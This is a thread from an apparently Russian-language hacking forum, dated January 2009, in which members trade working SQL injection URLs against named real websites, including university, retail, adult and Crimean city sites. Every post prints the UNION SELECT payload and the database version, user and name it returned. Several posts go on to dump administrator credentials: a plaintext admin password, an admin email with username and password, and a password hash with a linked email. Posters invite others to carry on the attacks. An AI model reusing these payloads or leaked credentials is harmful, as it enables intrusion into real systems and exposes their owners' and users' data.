13.01.2009, 11:35
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
на мой взгляд очень интересная inj
при запросе
Код:
http://otium.ru/artists/?id=13'
выдаёт Ошибка! Не могу выполнить SQL запрос
работая order by добиваемся того, чтобы это сообщение пропало
Код:
http://otium.ru/artists/?id=-13+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5--
user(): otium_ru@localhost
version(): 5.1.29-rc
database(): otium_ru
тИЦ: 50
PR: 4 |
|
|
13.01.2009, 15:45
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
Магазинчики
http://www.royallifestyle.in/category.php?id=31+union+select+1,concat_ws(0x3a3a ,version(),user(),database()),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32--&cid=23
5.0.51a-community
royal_royalife@localhost
royal_royalife
http://www.royallifestyle.in/category.php?id=31+UNION+SELECT+1,CONCAT(0x7873716 C696E6A626567696E,(SELECT+CONCAT(id,0x7873716C696E 6A64656C,username,0x7873716C696E6A64656C,password) +FROM+royal_royalife.tb_admin),0x7873716C696E6A656 E64),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32--&cid=23
admin
123
http://www.positivehands.co.uk/products/category/Baby-Products/0/1291+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database()),4,5,6,7,8,9,10,11,12,13,14,15--.html
Database Version: 4.1.22-standard
Database name: mohi4421_positivenew
User name: mohi4421_kalexik@localhost
|
|
|
|
13.01.2009, 16:24
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
И снова крым. Сайт города Симферополь
Код:
http://www.simferopol.org/modules/mydownloads/ratefile.php?lid=-24%20%20UNION%20SELECT%20concat_ws(0x3a3a,version(),user(),database())
version: 4.0.27-max-log
user:dbo95496483@74.208.16.2
database:db95496483
Последний раз редактировалось jokester; 13.01.2009 в 16:45..
Причина: Боян
|
|
|
|
13.01.2009, 16:27
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
еду...
Код:
http://organelledb.lsi.umich.edu/gene.php?id=-210148+union+select+1,version(),3,4,5,6,7,8,9--
magic_quotes=off
5.0.22-log
|
|
|
|
13.01.2009, 16:28
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://maricopa.edu/news/?story=-511+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E6 4),0x71),0x71),4,5--
тИЦ = 550
PageRank = 7
Database Version: 5.0.18-log
Database name: news
User name: news@sysweb1a.dist.maricopa.edu
Там в общем несколько баз и сайтов
Сильно расскапывать не стал кому надо продолжит.
http://www.mcli.dist.maricopa.edu/ocotillo/retreat05/gps_session.php?id=31+UNION+SELECT+1,AES_DECRYPT(A ES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Versi on(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x787 3716C696E6A656E64),0x71),0x71),3--
тИЦ = 210
PageRank = 6
Database Version: 5.0.18-log
Database name: ocotillo
User name: mcliweb@www.mcli.dist.maricopa.edu
|
|
|
|
13.01.2009, 17:11
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://www.geniv.com/ako888/search_lyric2.php?id=-55+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7--
5.0.51a-log
genivcom_geniv@boscgi1403.eigbox.net
genivcom_geniv
http://www.dhammaweb.net/monk/view.php?id=9831+union+select+1,2,3,4,5,6,concat_w s(0x3a3a,version(),user(),database()),8,9,10,11,12 ,13,14,15,16--
4.0.27-max-log
sayadaw@64.202.166.236
sayadaw
http://www.spartapewter.com/product-profile.php?ID=31+union+select+1,2,3,4,5,concat_ws (0x3a3a,version(),user(),database()),7,8,9,10--&IID=2&MID=5&CID=62
4.1.22-log
sparta_user@localhost
sparta_data
|
|
|
|
13.01.2009, 17:31
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
RuSoft.net
Код:
http://www.rusoft.net/download.php?id=-804%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12%20--
version:5.0.22
user:rusoft@localhost
database:rusoft |
|
|
|
13.01.2009, 20:50
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
SAN DIEGO STATE UNIVERSITY
http://larc.sdsu.edu/langmash/mashuplist.php?id=5678944+union+select+1,2,concat_ ws(0x3a3a,version(),user(),database()),4,5--
http://larc.sdsu.edu/langmash/mashuplist.php?id=5678944+UNION+SELECT+1,2,concat_ ws(0x3a3a,email,username,password),4,5+FROM+mashup .admin_details--
jvitagli@mail.sdsu.edu::jvitagli::mashup
Database Version: 5.0.45-log
Database name: mashup
User name: fnu@localhost
А вот до этого не добрался http://sdsu.edu
Мож кто нить доберётся подскажите...
|
|
|
|
13.01.2009, 22:38
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
Типа Адалт и всё такое -) XXX
http://www.siam2play.com/play-clip.php?id=401798798798798+union+select+1,2,3,con cat_ws(0x3a3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13--&hasp=Sexy
Version:5.0.67-community-log
User:feedsone_ple@localhost
Database:feedsone_siam2play
http://www.beastiemixes.com/remixer.php?id=5234560+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4,5,6,7,8,9,10 ,11,12--
Version:4.1.22-max-log
User:beastiemixes2@64.202.163.149
Database:beastiemixes2
http://www.gamesinaflash.com/game.php?id=31234567+union+select+1,2,3,4,5,6,conc at_ws(0x3a3a,version(),user(),database()),8,9,10,1 1,12,13,14,15,16,17,18--
Version:4.1.22-standard
User:designnow@localhost
Database:designnow
|
|
|
|
13.01.2009, 23:40
|
|
Новичок
Регистрация: 07.09.2008
Сообщений: 26
С нами:
9302190
Репутация:
26
|
|
Код:
http://mirsnov.ru/dream.php?id=-196+union+select+concat_ws(0x3a,name,pass),user(),version(),4,database(),6+FROM+authors+limit+5,1--
user: u90152@10.10.227.201
version: 5.0.67-log
database: u90152_mirsnov
http://mirsnov.ru/admin/
name: ornata
pass: 492446ef7a314e3983a73efd5e9ea4a1 197174 (также к емейлу подходит orlovanatalie@nm.ru) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
